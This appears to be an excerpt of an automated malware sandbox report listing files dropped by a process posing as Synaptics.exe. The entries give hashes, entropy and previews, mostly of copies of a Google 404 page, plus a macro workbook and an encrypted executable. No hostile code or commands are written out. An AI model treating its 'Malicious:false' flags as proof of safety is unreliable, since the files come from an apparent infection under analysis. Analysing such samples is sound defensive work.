                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JygWxfgtAWja071fEuIkLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\laCQXzP.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.266078204969841
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                            MD5:FF45F620EEF5ED51A13AB4B8BE209D3E
                                                                                            SHA1:26E784AAC33B24A459DF27B82E2FE2FF347B8337
                                                                                            SHA-256:22873BBEBAAABAF98F1E315046AB6D5C460F415979E7866B150BD79F944BD841
                                                                                            SHA-512:8E6F473E9F4806D849875474961EB6E49E29C051D2A78DEAA3811A4755337D88195D8ABC9C26487D6273326263652E4E9DED6DEF84F631FE3BBCA14AA8EF0649
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nYjggBjz5g3bEosDzI4HVQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\mxxLiee.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260084626057697
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0SnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                            MD5:6AC6647248A1C6D54EC71FB73F81DF95
                                                                                            SHA1:E8AE6FB30E8F05FEB82D1910219119D3C5A44725
                                                                                            SHA-256:529E9BB2069965CA2C7F8D58A01FA5F83F9603F1B45E4857B087324DA0FDE3C2
                                                                                            SHA-512:5442988330EEFFC75884023009240CB5D3E8FCE8A9E8614374218BCC2268E8A513CCD9A43A067F193F2B43CCB6AC34EE8EC35DBBB37086D07D88F82F8B4A116C
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9PpFFgKPvwmZokTNYv2U5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\nH4Vmrz.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.266119648604836
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0BnDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++D+pAZewRDK4mW
                                                                                            MD5:1ADF6A17A911368783248B5E1854A85C
                                                                                            SHA1:EF6177228F6000ABC59965877EC63ADA4DC4C20C
                                                                                            SHA-256:5B0202A86D58175F64692FBE85AAF20F43BC5E5A34B528279BB9E285ADA55CC7
                                                                                            SHA-512:1B7DDA5869FE3A3FC4752BBAC49FB5848B8C5FAEF28E8E9A7FDF268A09B9FB151F422D6BD1A1242ABB3BBE2E802DA616D75F4286DEA2B258F56F8059301895ED
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="64R9QLcx7JyNr9o63fGvTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\ofbduaaa.xlsm

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Category:dropped
                                                                                            Size (bytes):18387
                                                                                            Entropy (8bit):7.523057953697544
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                            Malicious:false
                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                            C:\Users\user\AppData\Local\Temp\orMnlri.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2591981258323015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                            MD5:99A547AB3B4CAC4B7BFDD130D7C32AAD
                                                                                            SHA1:199895644E2450A594DADD47A0C4EF267B9296F3
                                                                                            SHA-256:B32995C52E2F7121B794B2C482B53091852D9DADFD8AC4E2CB20107B2D0082C1
                                                                                            SHA-512:B27E2A599F3F94C4210B8E5EC9F039CC9366105660DECBEB44E3B6DFD8B4A4564C32AEF3B81E0C4B341EFF1304B41296C28828A61FE9E9903110A60815E49E7B
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Nqa_NoErehvXtDKZsuDqtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\pLC5FJJ.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255257991087609
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                            MD5:BADBC3787869B1326690E1DD19C89C3D
                                                                                            SHA1:97B498ECCC086EAF8F3D61B15A80EE67C0DD6099
                                                                                            SHA-256:413F07F207D347C62AB8E0F16AA6E9A0358FE58CF4FA1D001D0D65C80DB875D8
                                                                                            SHA-512:1355B1535E220ADEFDFC4E687DFEBE39EB2C5D71F8F568A4C4DCCE893B260A08ACC44FAE2107EFB520113568E0E9BCA1ADF6DFACBCB4B4AB448CB08736C4DF1F
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8CO5G2VCo1zrxMots68zig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\pVfGqz4.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260989398724525
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0z/DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W/D+pAZewRDK4mW
                                                                                            MD5:0EF27F74BF5E7CAC74FE272E3D239FCE
                                                                                            SHA1:ACBBF089CA44CA9AC5895144EC524B1A29AC4DDA
                                                                                            SHA-256:C5593267CF7795B672F67579B2F4A9E37F17C7A47A2489827FE144C0F37C9023
                                                                                            SHA-512:D02CF6898090298464EBA19F4D5F63759DD86BBFAF9D4707962DDE7D12DE391775BD550733F73EC50C93340710618B831E407BA833B44A72CCA83A43C326B84D
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WAWTS_NDJvyy7bdtl3lGwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\qKH5Yrm.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.274498892722879
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+06gGzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TgW+pAZewRDK4mW
                                                                                            MD5:7505A14C2FFA403F6D1C5B6D20254540
                                                                                            SHA1:BEDB024398896680FB9309FAB399073B93346D18
                                                                                            SHA-256:0EE6DA01D036F313D758B10F9699BB26C480C8CDCA8D661C4BFBDB470C51A7E0
                                                                                            SHA-512:C7D3D22B5A0D4B9B15397E22EC6C0CAA23488226E5D37710B0D9D9B6A6E00FED323D448AEE621E8B9B39254F3233DBF6BAE73F98C8B523BC36D4AAB0F6098D86
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xhSX5YA_RJqF72LVWpyTcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\qoL2zOE.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260729230890499
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GW1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y1+pAZewRDK4mW
                                                                                            MD5:E11A38E33287E151A87A2FF54D49897B
                                                                                            SHA1:E48D04D9FAD9A10D378569FF85E603312A61315C
                                                                                            SHA-256:3D0F33EB26B5955EB7D1C913824DF699F1B8AEF52562B588A1FE5017D5F384C0
                                                                                            SHA-512:2E27AF8A698985DDD4711895FF1264C02A56B5774D60973541EEDCC3D1BB4967BBE4DEE8C2C37D232561A23D2D17EE11D5833C59C227E28DADB046FEB90B6F42
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zruuiq4UMIZi5I3hwwXwMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\roSA56x.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2592661538674275
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                            MD5:F3931AE69D4E84A3F9B8D2AB28A0403D
                                                                                            SHA1:BF24CCC24F2C0281228505AC543A6A38D8E251B0
                                                                                            SHA-256:7BEE4843E9CF75A5D7F30222365085BE8FA97A70BC0ADF765D645ECD0CCB3B15
                                                                                            SHA-512:1D7AB90175F21E20DDC38AB0B37265526FC3D33D81E05A07053A07A8DE587D3BD2F34F015D7A21F0CC648B157688EECEAC628D249DF5A66A63AACDA0F7F944E2
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cJJDPc5894Nnd4aqdevzAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\rwuvIG2.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.276236519500764
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                            MD5:D13437C0275E402F15E3419E59B6365D
                                                                                            SHA1:6B9247344B62585FCC01100C7522DD7500479E27
                                                                                            SHA-256:320824A418D41FC9E4297D39E4FB1C37A057E8C46DDC6DACB338252FDAA93CE0
                                                                                            SHA-512:D90CB155873FF1C55FED716D6B86E4DB439A13F6EB6BFFC7E30529375D2A8188B8E37A3C190CA8FC773BE9F687062F2154EEA36AC4A4AE5D4C0BD43473DDCC9B
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j2PWoccFE9PWQhVYNDFSDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\xUhnLnC.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.246046669044378
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                            MD5:6C50F4624EA13301602D21A1DC1F61DB
                                                                                            SHA1:E829FB4D4FD81DC816DB2E36AE4B810E5982DC5C
                                                                                            SHA-256:0F46D54721F533C078622C0AD5A1B255A5A521ED6B29FE4FFA155AD76A95ABD7
                                                                                            SHA-512:2E8EF78BF5EF2EA16137C4402299D0E202450250835E7A13EE7A8B0BD6CB25EBE04CF0201D3C83743F58D5B47BF116651A0FECCF62A677F6F1A6270A304D39AC
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t99Pod_SdWnvrwmLLcf4dw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\ytNi4cm.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.243646386667518
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0k0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N0z+pAZewRDK4mW
                                                                                            MD5:25F60CA43A78BBA355B07F102F80D19A
                                                                                            SHA1:5F9C6FAC036D7D6A9F45C9DDB7F44713451A6575
                                                                                            SHA-256:A6D7080B33EB0F3BE5828059480EEA682824EBF8D91D9B0D1DE92781D9045B3E
                                                                                            SHA-512:A42B1DED92D842551C353F34451647FC0AF2E26648B44F32EF812CE8CD5442B0D711522E2549F5B1681B6A0CD9056FA2A6014D337B1E7D8691F2C910875A4CFB
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fggc_rpKEepgXceO3IUbig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\zVfsqzE.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.25111418958966
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0mKqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bKqI+pAZewRDK4mW
                                                                                            MD5:55299A12B51FE19812667D918BF83163
                                                                                            SHA1:3CBC3A71691824B22BF2F6895DCDF3C06B416784
                                                                                            SHA-256:29947F631D2852603D6E61AAADFFD5BD5644D2B11D000D45EE63E3C99AB911EF
                                                                                            SHA-512:9CCC6AB8566E72A306E5B52B083CC5CC0AE69E93C2FB7FD62498D9EA1FEE6F773BF06AB72BEC8544587766FCA89959AD9AAAAF53170FB3AEA648BAC9ABE2CAE8
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iMtiXs6204lkXen1viFQ6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\Desktop\._cache_file.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):5718872
                                                                                            Entropy (8bit):7.999141578918811
                                                                                            Encrypted:true
                                                                                            SSDEEP:98304:EuLgywiNHBeSLxYK/bxE3q/BlZkWMGPQflVJ/EK1sLyzs2T2Q1mOjq4/:V7wqheSVYK/bua/BlWWnuVhsus8nm+qi
                                                                                            MD5:630D75210B325A280C3352F879297ED5
                                                                                            SHA1:B330B760A8F16D5A31C2DC815627F5EB40861008
                                                                                            SHA-256:B06546DDC8CA1E3D532F3F2593E88A6F49E81B66A9C2051D58508CC97B6A2023
                                                                                            SHA-512:B6E107FA34764D336C9B59802C858845DF9F8661A1BEB41436FD638A044580557921E69883ED32737F853E203F0083358F642F3EFE0A80FAE7932C5E6137331F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ...............................3X.......... ...................................................,W.X........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc.............V.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\Documents\AFWAAFRXKO\NHPKIZUUSG.xlsm

